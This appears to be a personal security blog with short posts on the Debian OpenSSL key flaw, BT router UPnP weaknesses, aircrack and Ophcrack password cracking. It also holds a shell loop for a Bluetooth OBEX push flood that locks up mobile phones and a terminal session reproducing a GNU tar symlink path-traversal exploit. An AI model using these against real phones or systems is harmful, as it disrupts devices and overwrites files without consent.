security

Debian 'fixes' OpenSSL

Tagged:  

So it would appear that Debian "fixed" a problem in OpenSSL a few years ago. Unfortunately this "fix" has meant that they have had to release this security announcement.

Now this vulnerability is quite bad, so much so that Debian have stated the following:

It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.

Ben Laurie has posted a great blog entry as to why this so stupid. This quote from that entry sums the problem up nicely:

Secondly, if you are going to fix bugs, then you should install this maxim of mine firmly in your head: never fix a bug you don’t understand.

Hacking BT Home Hubs

Tagged:  

So first we have the BT Voyger that gave out your username and password if you asked it nicely.

Then, yet again, BT ship a router which another flaw in it.

I've always had this gut feeling that UPnP was bad. It allows machines on your network to modify, for example, settings on your router without any authentication.

Password Analysis

Tagged:  

After a recent phishing scam, which resulted in someone gaining over 55,000 passwords for my space, someone has posted some analysis on the passwords.

See the results here

Kernel Sorted

Tagged:  

Upgrading my kernel to 2.6.18 appears to have fixed the issue I was having with aircrack.

Now just need to write a script to make things a bit easier.

Aircrack

Tagged:  

Finally got a 1/2 decent wireless card that will do packet injection.

All I need to do is wait for my kernel to compile again to remove SMP support. At which point I can get on with this tutorial.

Ophcrack

Tagged:  

I've yet _really_ understand Rainbow Tables but this article gives a good overview on the subject.

Using this concept Ophcrack allows you to recover passwords from Windows based machines very quickly (we are talking single figure minutes at the most here) by exploiting the fact that, by default, Windows uses saltless hashes for passwords.

The iso is downloading at the moment and will be put to good use ;)

Suspect Nation

Tagged:  

[Watch on youtube]

Well worth watching if you are at all interested in security.

Its a documentary on the "Security" measures that the british goverment are putting in place, making you think if they are really a "good thing".

For hard core tech people, features include:

  • RFID Exploits (including UK Passports)
  • CCTV Security
  • Wireless Security
  • Mobile Phone exploits

Enjoy!

Bluetooth Obex DoS

Tagged:  

DoS your mobile phone with lots of Obex pushes. It would seem that most mobiles force you to either accept or deny the push, this disables any other usage of the phone including the ability to turn off bluetooth.

This has apparently been confirmed on the following phones:

  • Sony Ericsson K700i
  • Nokia N70
  • Motorola MOTORAZR V3
  • Sony Ericsson W810i
  • LG Chocolate KG800

No doubt many other phones are effected.

Attached is the current release of the ussp-push program which uses the Bluez bluetooth stack to do a Obex push.

All that is required is a wrapper script of the form:

while true
do
        ./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done

You can work the rest out yourself...

tar exploit in the wild

Tagged:  

Just when you thought you were safe...

http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050812.html

Have tested this and it works as described:

nathan@holly /tmp $ tar --version
tar (GNU tar) 1.15.1
nathan@holly /tmp $ ~/tmp/tarxyz > foo.tar
nathan@holly /tmp $ mkdir -p xyz/home/foo
nathan@holly /tmp $ echo "Hello" > xyz/home/foo/hello.txt
nathan@holly /tmp $ tar -rf foo.tar xyz/home/foo
nathan@holly /tmp $ rootdo mkdir /home/foo
nathan@holly /tmp $ rootdo chown nathan /home/foo
nathan@holly /tmp $ rm -rf xyz
nathan@holly /tmp $ tar -xf foo.tar
nathan@holly /tmp $ ls -l xyz
lrwxrwxrwx 1 nathan users 1 Nov 22 00:03 xyz -> /
nathan@holly /tmp $ cat /home/foo/hello.txt
Hello
nathan@holly /tmp $ 
Syndicate content